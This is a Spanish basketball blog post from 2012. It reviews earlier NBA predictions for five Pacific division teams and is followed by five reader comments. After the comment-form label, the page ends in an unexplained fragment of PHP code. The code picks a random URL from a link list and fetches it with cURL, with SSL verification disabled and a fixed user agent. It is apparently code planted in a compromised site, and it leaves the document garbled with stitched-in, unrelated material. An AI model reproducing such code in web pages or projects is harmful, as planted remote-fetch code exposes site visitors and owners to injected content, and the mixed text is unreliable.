Revisando los pronósticos 2012: Pacific

12 de March de 2012 por TheDeerHunter

LOS ANGELES CLIPPERS

Pronóstico Enero 2012: Finalistas de conferencia (análisis)
Probabilidad de acierto: Medio-bajo
Calificación pronóstico: C-

“Se acabaron las excusas” decíamos. Nada menos que “finalistas de conferencia”. “Será un fracaso si este equipo no es campeón en 5 años”. Palabras mayores en una franquicia poco acostumbrada a los elogios.

Un gran proyecto, sí señor. Se han movido con decisión y acierto aparente. El premio, de momento, han sido veladas de ensueño, de equipo grande, victorias de mérito y la sensación poco frecuente de mirar por encima del hombro al vecino rico. Sin embargo, ahí están. Virtualmente empatados con unos Lakers extremadamente irregulares, molidos a críticas. Hay una extraña sensación de decepción en el aire. ¿Perdiendo fuelle?

Era demasiado bonito en una casa tan maltratada por el destino. Impresionante la manera con la que los fichajes se habían integrado en el equipo. Chris Paul volvía a mandar en la lista de bases, Billups jugaba de escolta pareciéndose cada día más a la versión más resolutiva de si mismo y rezumando experiencia de campeón, Caron Butler desempeñaba un rol secundario con el que siempre se sintió cómodo. Y encima sonaban Kenyon, JR Smith… ¿quién no empezaba a considerarlos verdaderamente en serio?

Fue el 6 de Febrero cuando Billups se rompía gravemente. Precisamente la posición de 2, la que más con pinzas tenían cubierta. La excusa que nadie quería. Hasta ese momento sólo habían sido derrotados un tercio de partidos pero a partir de entonces no se ha llegado ni al 50%. Demasiado lujo para un candidato.

A Billups ya no lo recuperan este curso, pero aún se pueden decir muchas cosas. La impresión es que sigue habiendo mucho nivel en el Oeste y que les será extremadamente complicado pasar de 2ª ronda, si es que la alcanzan.

Sin reproches llegado el caso. Nadie dijo que fuera fácil montar un equipo ganador.

LOS ANGELES LAKERS

Pronóstico Enero 2012: Finalistas de conferencia (análisis)
Probabilidad de acierto: Medio-bajo
Calificación pronóstico: C-

¿Hacia dónde se dirigen los Lakers? Después de varios meses estamos lejos de encontrar la respuesta.

Nadie está contento en L.A. Es difícil estarlo en el caso de Gasol cuando es pública y notoria su condición de interinidad. Es difícil encontrar la motivación cuando eres consciente que a más es difícil que vayas y que después de haber conocido el cielo estás condenado a deambular por un limbo muy poco reconfortante.

Tampoco parece contento Kobe a pesar de contar con toda la libertad del mundo para reivindicar su talento y para apurar su mejor condición. Quizás sea que se va dando cuenta que su actual mejor versión ya no es suficiente y el tiempo se acaba.

Del resto qué decir. Quitando a Bynum, que siendo lo poco futurible que se aprecia tampoco está definido, tenemos una plantilla desgastada. Retales parcheados de un traje que en su día fue de lujo, pero que ahora nadie se atrevería a vestirlo en las mejores fiestas. Pero es que ni hemos logrado resolver la cuestión del nuevo cuerpo técnico. ¿Alguien puede señalar una característica, un patrón común a aquellos Cavs subcampeones, que defina el trabajo de Mike Brown?

El ambiente en la casa dorada y púrpura parece lo peorcito de la competición, o como mínimo de los equipos que aspiran a postemporada. Se da prácticamente por descontado que se van a producir cambios significativos a corto plazo. Quizá encontremos respuestas a nuestras cuestiones cuando eso ocurra.

PHOENIX SUNS

Pronóstico Enero 2012: Fuera de Playoffs (análisis)
Probabilidad de acierto: Total
Calificación pronóstico: C-

Titulábamos nuestro análisis como “Soles apagados”, les dábamos bastantes palos, se llegó a crear un topic en Twitter para liberar a Nash… ¿Estamos siendo justos con los Suns?

La ilusión de ver a Nash con un anillo creo que nos hace perder un poco la perspectiva. Siendo un equipo más bien mediocre y con una plantilla floja la temporada es digna. No andan tan lejos del 50% y en el Este estarían peleando por la 8ª plaza de playoffs. ¿Están obligados moralmente a tirarse piedras contra su tejado por facilitar la vida a Nash? ¿A qué santo?

No se clasificarán para playoffs, es casi imposible, pero imagino que asumiendo esta situación los aficionados Suns lo están pasando razonablemente bien en los partidos. Al menos mejor que otros que yo me sé y están mucho mejor clasificados. El equipo juega vistoso, transmite vitalidad y para nada regalan las victorias. Y disfrutar de los últimos pases de Nash debe ser algo como degustar esas últimas gotas de tu mejor gran reserva. Las camisetas nº 13 los Suns se seguirán vendiendo como churros.

Y debe llegar el momento que se largue. Se está hablando mucho de eso últimamente. Es complicado imaginar que la contrapartida que puedan recibir mantenga remotamente el nivel. Supondría un tramo final de temporada posiblemente cuesta abajo, pero al fin y al cabo es lo que se esperaba desde el principio.

GOLDEN STATE WARRIORS

Pronóstico Enero 2012: Fuera de Playoffs, 24-42 (análisis)
Probabilidad de acierto: Estarán fuera de playoffs, pero están a 9 victorias de las 24.
Calificación pronóstico: C+

Las llanuras del tránsito. Bonito título para un análisis, pero de una connotación bastante peor. Efectivamente es una franquicia que vaga sin clara identidad. De alguna manera, han interiorizado el carácter disperso del que fue considerado jugador franquicia y ahora ponen en el escaparate. Alguien dijo por aquí que el resto de la liga no contempla a Monta Ellis como el jugador estelar que creen tener en Oakland. Se apostó muy fuerte por el talento mágico de Ellis pero pronto se comprobó una indefinición que ha terminado contagiando a la franquicia.

Los Warriors aún pueden deslumbrar y ofrecer alguna velada memorable, evocando el “We Believe” o esa “orgía de puntos” con lluvia de triples contra Orlando que mencionamos en el análisis. Pero de repetitivo da hasta pereza tratar de vibrar con esas machadas que nunca conducen a ningún sitio. No es lo mismo mirar un proyecto joven liársela a algún grande pensando que hay recorrido que hacerlo con la convicción de saber que esto es todo lo que hay y el final del camino es un intrascendente partido suelto en la regular donde les entra todo.

Los resultados no están siendo malos para lo que tiene  pero es que el proyecto está caduco. Traspasarán a Monta, pero el final de la llanura está lejos de ser vislumbrado.

SACRAMENTO KINGS

Pronóstico Enero 2012: Fuera de Playoffs, 20-46 (análisis)
Probabilidad de acierto: También estarán fuera de playoffs, pero por encima de 20 victorias.
Calificación pronóstico: C-

El horizonte no es tan negro en Sacramento como pensábamos. Nada de “despedirse dignamente”. Parece que a los Kings les queda cuerda en la capital de California y nosotros nos alegramos. Es un punto de estabilidad que parece haberle sentado razonablemente bien al equipo. Decíamos que son “perdedores por concepción” y poníamos bastante verdes a unos y otros pero ¿lo está pasando tan sumamente mal el aficionado “cencerrero”? Yo diría que tampoco tanto. Tienen razones más que de sobra para el optimismo.

Son bastante desastre defensivamente, el peor equipo de la tabla, pero a partir de ahí están jugando razonablemente bien, sobre todo desde que le dieron las riendas al pequeño Isiah Thomas. Thomas, Thornton, Evans, menuda tríada. Un small ball como nos gusta, dándole sustos a más de uno. Todavía hay recorrido. Nos carga un poco el amigo Cousins, para qué nos vamos a engañar. Es tan bueno como propenso al cortocircuito. Paciencia de santo que debe de tener Westphal Keith Smart.

Pues eso. Un destino estabilizado y un proyecto con futuro. Es mucho más de lo que podían soñar hace unos meses.

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    los clippers, con billups, creo que hubiesen llegado a final de conferencia, no solo por que billups es un campeon experimentado, que no falla un libre en los ultimos minutos y en PO puede tomar los ultimos tiros, SINO MAS BIEN POR QUE SU REEMPLAZANTE EN FOYLE, lo esta haciendo medianamente bien, pero juega al maximo de sus posibilidades y no le puede ni hacer som,bra a big shoot, es malo en defensa y no tiene un gran seleccion de tiro, pero lo peor es quien ocupa el puesto de escolta suplente, NADIE!!! vemos alli jugar muchos minutos a MO, pero con apenas mas de 1.80 debes ser tan bueno como iverson para jugar de dos en esta liga

    los lakers, con odom, serian candidatos nuevamente, o supliendon a odom con beasley y fichando algun base a ver como les sale, sacando a los 3 grandes (miami, chicago y el thunder), esta todo muy parejo, los lakers estan ahi, cerquita de todos, con brown y odom, serian contendientes

      Citar

  2. Melo15 dice:
    #2

    Sabesi que Foye tiene los organos al reves, tiene el corazon rn ña derecha, Flipante

      Citar

  3. simon dice:
    #3

    yo es que de los Lakers no me pensaba lo de Beasley, hay suficiente capo para si saca los pies del tiesto darle un par de collejas y este año termina contrato, si no sale bien con no renovarle no tienes que sufrir mas… otra cosa es que quieran o prefieran utilizarla en un base…

      Citar

  4. Sancho88 dice:
    #4

    Nos carga un poco el amigo Cousins, para qué nos vamos a engañar. Es tan bueno como propenso al cortocircuito. Paciencia de santo que debe de tener Westphal.

    Esto ha cambiado, hermano, jejee. Westphal debe estar reciclándose, porque menuda entrenador… lamentable. Con Smart han mejorado bastante en defensa. Hayes, Thomas, Salmons y García, y Evans cuando quiere, pueden defender muy bien, y de hecho lo están haciendo. A ver si de una santa vez, el año que viene empiezan a aspirar a algo… Aburrir no aburren, pero sí desesperan muchas veces.

    Y hombre, la verdad que a principio de año pintaba la cosa muy oscura. Se ha solucinado, una historia muy bonita del deporte. En mi blog lo cuento, si queréis ya le dije a Txus que piyara la entrada si la queriais publicar aquí.

      Citar

  5. Sancho88 dice:
    #5

    Melo15:
    Sabesi que Foye tiene los organos al reves, tiene el corazon rn ña derecha, Flipante

    Eso es vox pópuli (para los de la Logse, conocido por todos) desde hace mucho tiempo… igual que Blair jugando sin ligamentos cruzados, Livingston corriendo como si nada en los Bucks cuando estuvo a punto de perder una pierna en su etapa en los Clippers, etc. Hay muchas historias curiosas por ahí…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>